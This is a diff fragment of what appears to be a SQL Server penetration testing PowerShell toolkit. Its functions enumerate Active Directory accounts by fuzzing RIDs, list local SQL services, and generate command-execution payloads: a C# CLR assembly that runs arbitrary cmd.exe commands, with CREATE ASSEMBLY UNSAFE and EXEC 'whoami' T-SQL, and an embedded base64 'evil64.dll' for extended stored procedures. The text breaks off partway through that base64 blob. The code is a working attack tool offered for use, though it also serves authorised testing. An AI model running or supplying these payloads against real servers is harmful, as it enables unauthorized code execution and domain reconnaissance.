HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Principal ID to start fuzzing with.')] + [string]$StartId = 500, + + [Parameter(Mandatory = $false, + HelpMessage = 'Principal ID to stop fuzzing on.')] + [string]$EndId = 1000, + + [Parameter(Mandatory = $false, + HelpMessage = 'Set a custom domain for user enumeration. Typically used to target trusted domains.')] + [string]$Domain, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblFuzzedAccounts = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Grab server and domain information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $ComputerName = $ServerInfo.ComputerName + $Instance = $ServerInfo.Instance + if(-not $Domain){ + $Domain = $ServerInfo.DomainName + } + + # Status the user + Write-Verbose -Message "$Instance : Enumerating Active Directory accounts for the `"$Domain`" domain..." + + # Grab the domain SID + $DomainGroup = "$Domain\Domain Admins" + $DomainGroupSid = Get-SQLQuery -Instance $Instance -Query "select SUSER_SID('$DomainGroup') as DomainGroupSid" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $DomainGroupSidBytes = $DomainGroupSid | Select-Object -Property domaingroupsid -ExpandProperty domaingroupsid + try{ + $DomainGroupSidString = [System.BitConverter]::ToString($DomainGroupSidBytes).Replace('-','').Substring(0,48) + }catch{ + Write-Warning "The provided domain did not resolve correctly." + return + } + + # Fuzz the domain object SIDs from StartId to EndId + $StartId..$EndId | + ForEach-Object -Process { + # Convert to Principal ID to hex + $PrincipalIDHex = '{0:x}' -f $_ + + # Get number of characters + $PrincipalIDHexPad1 = $PrincipalIDHex | Measure-Object -Character + $PrincipalIDHexPad2 = $PrincipalIDHexPad1.Characters + + # Check if number is even and fix leading 0 if needed + If([bool]($PrincipalIDHexPad2%2)) + { + $PrincipalIDHexFix = "0$PrincipalIDHex" + } + + # Reverse the order of the hex + $GroupsOfTwo = $PrincipalIDHexFix -split '(..)' | Where-Object -FilterScript { + $_ + } + $GroupsOfTwoR = $GroupsOfTwo | Sort-Object -Descending + $PrincipalIDHexFix2 = $GroupsOfTwoR -join '' + + # Pad to 8 bytes + $PrincipalIDPad = $PrincipalIDHexFix2.PadRight(8,'0') + + # Create users rid + $Rid = "0x$DomainGroupSidString$PrincipalIDPad" + + # Define Query + $Query = "SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$Rid' as [RID], + SUSER_SNAME($Rid) as [DomainAccount]" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + $DomainAccount = $TblResults.DomainAccount + if($DomainAccount.length -ge 2) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - RID $Rid ($_) resolved to: $DomainAccount" + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - RID $Rid ($_) resolved to: " + } + } + + # Append results + $TblFuzzedAccounts = $TblFuzzedAccounts + $TblResults + } + } + + End + { + # Return data + $TblFuzzedAccounts | + Select-Object -Property ComputerName, Instance, DomainAccount -Unique | + Where-Object -FilterScript { + $_.DomainAccount -notlike '' + } + } +} + + +# ------------------------------------------- +# Function: Get-ComputerNameFromInstance +# ------------------------------------------ +# Author: Scott Sutherland +Function Get-ComputerNameFromInstance +{ + <# + .SYNOPSIS + Parses computer name from a provided instance. + .PARAMETER Instance + SQL Server instance to parse. + .EXAMPLE + PS C:\> Get-ComputerNameFromInstance -Instance SQLServer1\STANDARDDEV2014 + SQLServer1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance.')] + [string]$Instance + ) + + # Parse ComputerName from provided instance + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + } + else + { + $ComputerName = $env:COMPUTERNAME + } + + Return $ComputerName +} + + +Function Get-SQLServiceLocal +{ + <# + .SYNOPSIS + Returns local SQL Server services using Get-WmiObject -Class win32_service. This can only be run against the local server. + .PARAMETER Instance + SQL Server instance to filter for. + .PARAMETER RunOnly + Filter for running services. + .EXAMPLE + PS C:\> Get-SQLServiceLocal -Instance SQLServer1\SQL2014 | Format-Table -AutoSize + .EXAMPLE + PS C:\> Get-SQLServiceLocal | Format-Table -AutoSize + + ComputerName ServiceDisplayName ServiceName ServicePath + ------------ ------------------ ----------- ----------- + SQLServer1 SQL Server Integration Services 12.0 MsDtsServer120 "C:\Program Files\Microsoft SQL Server\120\DTS\Binn\MsDt... + SQLServer1 SQL Server Analysis Services (STANDARDDEV2014) MSOLAP$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSAS12.STANDARDDE... + SQLServer1 SQL Server (SQLEXPRESS) MSSQL$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... + SQLServer1 SQL Server (STANDARDDEV2014) MSSQL$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... + SQLServer1 SQL Full-text Filter Daemon Launcher (MSSQLSERVER) MSSQLFDLauncher "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... + SQLServer1 SQL Full-text Filter Daemon Launcher (SQLEXPRESS) MSSQLFDLauncher$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... + SQLServer1 SQL Full-text Filter Daemon Launcher (STANDARDDEV2014) MSSQLFDLauncher$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... + SQLServer1 SQL Server (MSSQLSERVER) MSSQLSERVER "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... + SQLServer1 SQL Server Analysis Services (MSSQLSERVER) MSSQLServerOLAPService "C:\Program Files\Microsoft SQL Server\MSAS12.MSSQLSERVE... + SQLServer1 SQL Server Reporting Services (MSSQLSERVER) ReportServer "C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVE... + SQLServer1 SQL Server Reporting Services (SQLEXPRESS) ReportServer$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSRS12.SQLEXPRESS... + SQLServer1 SQL Server Reporting Services (STANDARDDEV2014) ReportServer$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSRS12.STANDARDDE... + SQLServer1 SQL Server Distributed Replay Client SQL Server Distributed Replay Client "C:\Program Files (x86)\Microsoft SQL Server\120\Tools\D... + SQLServer1 SQL Server Distributed Replay Controller SQL Server Distributed Replay Controller "C:\Program Files (x86)\Microsoft SQL Server\120\Tools\D... + SQLServer1 SQL Server Agent (SQLEXPRESS) SQLAgent$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... + SQLServer1 SQL Server Agent (STANDARDDEV2014) SQLAgent$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... + SQLServer1 SQL Server Browser SQLBrowser "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\s... + SQLServer1 SQL Server Agent (MSSQLSERVER) SQLSERVERAGENT "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... + SQLServer1 SQL Server VSS Writer SQLWriter "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwrit... + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance.')] + [string]$Instance, + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for running services.')] + [switch]$RunOnly, + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + Begin + { + # Table for output + $TblLocalInstances = New-Object -TypeName System.Data.DataTable + $null = $TblLocalInstances.Columns.Add('ComputerName') + $null = $TblLocalInstances.Columns.Add('Instance') + $null = $TblLocalInstances.Columns.Add('ServiceDisplayName') + $null = $TblLocalInstances.Columns.Add('ServiceName') + $null = $TblLocalInstances.Columns.Add('ServicePath') + $null = $TblLocalInstances.Columns.Add('ServiceAccount') + $null = $TblLocalInstances.Columns.Add('ServiceState') + $null = $TblLocalInstances.Columns.Add('ServiceProcessId') + } + + Process + { + # Grab SQL Server services based on file path + $SqlServices = Get-WmiObject -Class win32_service | + Where-Object -FilterScript { + $_.DisplayName -like 'SQL Server *' + } | + Select-Object -Property DisplayName, PathName, Name, StartName, State, SystemName, ProcessId + + # Add records to SQL Server instance table + $SqlServices | + ForEach-Object -Process { + + # Parse Instance + $ComputerName = [string]$_.SystemName + $DisplayName = [string]$_.DisplayName + $ServState = [string]$_.State + + # Set instance to computername by default + $CurrentInstance = $ComputerName + + # Check for named instance + $InstanceCheck = ($DisplayName[1..$DisplayName.Length] | Where-Object {$_ -like '('}).count + if($InstanceCheck) { + + # Set name instance + $CurrentInstance = $ComputerName + '\' +$DisplayName.split('(')[1].split(')')[0] + + # Set default instance + if($CurrentInstance -like '*\MSSQLSERVER') + { + $CurrentInstance = $ComputerName + } + } + + # If an instance is set filter out service that dont apply + if($Instance -and $instance -notlike $CurrentInstance){ + return + } + + # Filter out services that arent runn if needed + if($RunOnly -and $ServState -notlike 'Running'){ + return + + } + + # Setup process id + if($_.ProcessId -eq 0){ + $ServiceProcessId = "" + }else{ + $ServiceProcessId = $_.ProcessId + } + + # Add row + $null = $TblLocalInstances.Rows.Add( + [string]$_.SystemName, + [string]$CurrentInstance, + [string]$_.DisplayName, + [string]$_.Name, + [string]$_.PathName, + [string]$_.StartName, + [string]$_.State, + [string]$ServiceProcessId) + } + } + + End + { + # Status User + $LocalInstanceCount = $TblLocalInstances.rows.count + + if(-not $SuppressVerbose){ + Write-Verbose "$LocalInstanceCount local SQL Server services were found that matched the criteria." + } + + # Return data + $TblLocalInstances + } +} + + +# ------------------------------------------- +# Function: Create-SQLFilCLRDLL +# ------------------------------------------- +# Author: Scott Sutherland +# References: This was built of off work done by Lee Christensen (@tifkin_) and Nathan Kirk (@sekirkity). +function Create-SQLFileCLRDll +{ + <# + .SYNOPSIS + This script can be used to create a CLR DLL to execute OS commands through SQL Server. It provides the option to set a custom procedure name. + By default, it will also create a file containing a "CREATE ASSEMBLY" TSQL command that can be used to create an assembly and function without + requiring the DLL. Finally, an the function can be used to convert an existing CRL DLL ascii hex so it can be used + to register the assembly without the DLL. + .NOTES + https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx + http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ + https://msdn.microsoft.com/en-us/library/ms254498(v=vs.110).aspx + https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-assembly-transact-sql + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'Procedure name.')] + [string]$ProcedureName = "cmd_exec", + + [Parameter(Mandatory = $false, + HelpMessage = 'Directory to output files.')] + [string]$OutDir = $env:temp, + + [Parameter(Mandatory = $false, + HelpMessage = 'Set custom assembly name. It is random by default.')] + [string]$AssemblyName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Set custom assembly class name. It is random by default.')] + [string]$AssemblyClassName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Set custom assembly method name. It is random by default.')] + [string]$AssemblyMethodName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Output name.')] + [string]$OutFile = "CLRFile", + + [Parameter(Mandatory = $false, + HelpMessage = 'Optional source DLL to convert to ascii hex.')] + [string]$SourceDllPath + ) + + Begin + { + + # ------------------------------------ + # Setup File Paths + # ------------------------------------ + $SRCPath = $OutDir + '\' + $OutFile + '.csc' + $DllPath = $OutDir + '\' + $OutFile + '.dll' + $CommandPath = $OutDir + '\' + $OutFile + '.txt' + + # Change source DLL to existing DLL if provided + if($SourceDllPath){ + $DllPath = $SourceDllPath + $SRCPath = "NA" + } + } + + Process + { + + # Status the user + Write-Verbose "Target C# File: $SRCPath" + Write-Verbose "Target DLL File: $DllPath" + + # Get random length + $ClassNameLength = (5..10 | Get-Random -count 1 ) + $MethodNameLength = (5..10 | Get-Random -count 1 ) + $AssemblyLength = (5..10 | Get-Random -count 1 ) + + # Create class name + If(-not $AssemblyClassName){ + $AssemblyClassName = (-join ((65..90) + (97..122) | Get-Random -Count $ClassNameLength | % {[char]$_})) + } + + # Create method name + if(-not $AssemblyMethodName){ + $AssemblyMethodName = (-join ((65..90) + (97..122) | Get-Random -Count $MethodNameLength | % {[char]$_})) + } + + # Create assembly name + If(-not $AssemblyName){ + $AssemblyName = (-join ((65..90) + (97..122) | Get-Random -Count $MethodNameLength | % {[char]$_})) + } + + if (-not $SourceDllPath){ + # Create c# teamplate that will run any provided command + # Based on template from http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ + $TemplateCmdExec = @" + using System; + using System.Data; + using System.Data.SqlClient; + using System.Data.SqlTypes; + using Microsoft.SqlServer.Server; + using System.IO; + using System.Diagnostics; + using System.Text; + public partial class $AssemblyClassName + { + [Microsoft.SqlServer.Server.SqlProcedure] + public static void $AssemblyMethodName (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the begining of the result-set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result-set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + + } + }; +"@ + + # Write out the cs code + Write-Verbose "Writing C# code to $SRCPath" + $TemplateCmdExec | Out-File $SRCPath + + # Identify csc path + Write-Verbose "Searching for csc.exe..." + $CSCPath = Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname + if(-not $CSCPath){ + Write-Host "No csc.exe found." + return + }else{ + Write-Verbose "csc.exe found." + } + + $CurrentDirectory = pwd + cd $OutDir + $Command = "$CSCPath /target:library " + $SRCPath + # write-verbose "CSC Command: $Command" + Write-Verbose "Compiling to dll..." + $Results = Invoke-Expression $Command + cd $CurrentDirectory + } + + # Read and encode file + Write-Verbose "Grabbing bytes from the dll" + if (-not $SourceDllPath){ + + # write from default file + $ProcedureNameSp = "$ProcedureName" + $stringBuilder = New-Object -Type System.Text.StringBuilder + $stringBuilder.Append("CREATE ASSEMBLY [") > $null + $stringBuilder.Append($AssemblyName) > $null + $stringBuilder.Append("] AUTHORIZATION [dbo] FROM `n0x") > $null + $assemblyFile = resolve-path $DllPath + $fileStream = [IO.File]::OpenRead($assemblyFile) + while (($byte = $fileStream.ReadByte()) -gt -1) { + $stringBuilder.Append($byte.ToString("X2")) > $null + } + $null = $stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") + $null = $stringBuilder.AppendLine("GO") + $null = $stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[$ProcedureNameSp] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [$AssemblyName].[$AssemblyClassName].[$AssemblyMethodName];") + $null = $stringBuilder.AppendLine("GO") + $null = $stringBuilder.AppendLine("EXEC[dbo].[$ProcedureNameSp] 'whoami'") + $null = $stringBuilder.AppendLine("GO") + $MySQLCommand = $stringBuilder.ToString() -join "" + $fileStream.Close() + $fileStream.Dispose() + }else{ + + # write from provided file + $stringBuilder = New-Object -Type System.Text.StringBuilder + $null = $stringBuilder.AppendLine("-- Change the assembly name to the one you want to replace") + $null = $stringBuilder.AppendLine("ALTER ASSEMBLY [TBD] FROM") + $null = $stringBuilder.Append("`n0x") + $assemblyFile = resolve-path $DllPath + $fileStream = [IO.File]::OpenRead($assemblyFile) + while (($byte = $fileStream.ReadByte()) -gt -1) { + $stringBuilder.Append($byte.ToString("X2")) > $null + } + $null = $stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") + $null = $stringBuilder.Append("") + $MySQLCommand = $stringBuilder.ToString() -join "" + $fileStream.Close() + $fileStream.Dispose() + + } + + # Generate SQL Command - note: this needs to be join together to work + Write-Verbose "Writing SQL to: $CommandPath" + $MySQLCommand | Out-File $CommandPath + + # Status user + Write-Host "C# File: $SRCPath" + Write-Host "CLR DLL: $DllPath" + Write-Host "SQL Cmd: $CommandPath" + } + + End + { + } +} + + +# ------------------------------------------- +# Function: Create-SQLFileXpDll +# ------------------------------------------- +function Create-SQLFileXpDll +{ + <# + .SYNOPSIS + This script can be used to generate a DLL file with an exported function that can be registered as an + extended stored procedure in SQL Server. The exported function can be configured to run any + Windows command. This script is intended to be used to test basic SQL Server audit controls around + the sp_addextendedproc and sp_dropextendedproc stored procedures used to register and unregister + extended stored procedures. + .PARAMETER ExportName + Name of the exported function that will be created. + .PARAMETER Command + Operating system command that the exported function will run. + .PARAMETER OutFile + Name of the Dll file to write to. + .EXAMPLE + PS C:\temp> Create-SQLFileXpDll -OutFile c:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + + Creating DLL c:\temp\test.dll + - Exported function name: xp_test + - Exported function command: "echo test > c:\temp\test.txt" + - DLL written + - Manual test: rundll32 c:\temp\test.dll,xp_test + + SQL Server Notes + The exported function can be registered as a SQL Server extended stored procedure. Options below: + - Register xp via local disk: sp_addextendedproc 'xp_test', 'c:\temp\myxp.dll' + - Register xp via UNC path: sp_addextendedproc 'xp_test', '\\servername\pathtofile\myxp.dll' + - Unregister xp: sp_dropextendedproc 'xp_test' + .LINK + http://en.cppreference.com/w/cpp/utility/program/system + http://www.netspi.com + + .NOTES + The extended stored procedure template used to create the DLL shell was based on the following stackoverflow post: + http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure + + Modified source code used to create the DLL can be found at the link below: + https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/xp_evil_template.cpp + + The method used to patch the DLL was based on Will Schroeder (@HarmJ0y) "Invoke-PatchDll" function found in the PowerUp toolkit: + https://github.com/HarmJ0y/PowerUp + #> + + [CmdletBinding()] + Param( + + [Parameter(Mandatory = $false, + HelpMessage = 'Operating system command to run.')] + [string]$Command, + + [Parameter(Mandatory = $false, + HelpMessage = 'Name of exported function.')] + [string]$ExportName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Dll file to write to.')] + [string]$OutFile + ) + + # ----------------------------------------------- + # Define the DLL file and command to be executed + # ----------------------------------------------- + + # This is the base64 encoded evil64.dll -command: base64 -w 0 evil64.dll > evil64.dll.b64 + $DllBytes64 = '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zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxAVVdIgezIAAAASIvsSIv8uTIAAAC4zMzMzPOruAEAAABIjaXIAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMTIlEJBiJVCQQSIlMJAhVV0iB7NgAAABIi+xIi/y5NgAAALjMzMzM86tIi4wk+AAAAIuF+AAAAImFwAAAALgBAAAASI2l2AAAAF9dw8zMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7AgBAABIjWwkIEiL/LlCAAAAuMzMzMzzq0iLjCQoAQAASI0Fb4EAAEiJRQhIi00I/xUZCwEAuAEAAABIjaXoAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiNBQH7///DzMzMzMzMzMxIjQUL+v//w8zMzMzMzMzMSIPsOIA96ckAAAB1LUG5AQAAAMYF2skAAAFFM8DHRCQgAAAAADPSM8nolPj//0iLyEiDxDjpVfn//0iDxDjDzMzMzMzMzMzMzMzMzMzMzMxIg+w4QbkBAAAAx0QkIAEAAABFM8Az0jPJ6FT4//9Ig8Q4w8zMzMzMzMzMzMzMzMxMiUQkGIlUJBBIiUwkCEiD7DiLRCRIiUQkJIN8JCQAdCiDfCQkAXQQg3wkJAJ0OoN8JCQDdD3rRUiLVCRQSItMJEDoaQAAAOs5SIN8JFAAdAfGRCQgAesFxkQkIAAPtkwkIOjpAQAA6xnoH/j//w+2wOsP6Cn4//8PtsDrBbgBAAAASIPEOMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhIg+xIM8no2vn//w+2wIXAdQczwOkjAQAA6Dv5//+IRCQgxkQkIQGDPeDIAAAAdAq5BwAAAOii+P//xwXKyAAAAQAAAOhv+f//D7bAhcB1Autw6K34//9IjQ2/+P//6EL4///okvj//0iNDZD4///oMfj//+ge9///SI0VBnoAAEiNDe94AADog/f//4XAdALrMOiA+f//D7bAhcB1AusiSI0Vv3cAAEiNDah2AADoQvj//8cFUcgAAAIAAADGRCQhAA+2TCQg6Mb2//8PtkQkIYXAdAQzwOtj6F73//9IiUQkKEiLRCQoSIM4AHQ7SItMJCjo1vb//w+2wIXAdCpIi0QkKEiLAEiJRCQwSItMJDDoWPf//0yLRCRYugIAAABIi0wkUP9UJDCLBY/HAAD/wIkFh8cAALgBAAAASIPESMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiEwkCEiD7DiDPRnHAAAAfwQzwOtkiwUNxwAA/8iJBQXHAADom/f//4hEJCCDPUXHAAACdAq5BwAAAOgH9///6Iv1///HBSrHAAAAAAAA6NX2//8PtkwkIOif9f//M9IPtkwkQOid9f//D7bAhcB1BDPA6wW4AQAAAEiDxDjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEyJRCQYiVQkEEiJTCQISIPsSMdEJDABAAAAg3wkWAF0B4N8JFgCdUZMi0QkYItUJFhIi0wkUOh1AQAAiUQkMIN8JDAAdQXp8AAAAEyLRCRgi1QkWEiLTCRQ6LL8//+JRCQwg3wkMAB1BenNAAAAg3wkWAF1CkiLTCRQ6N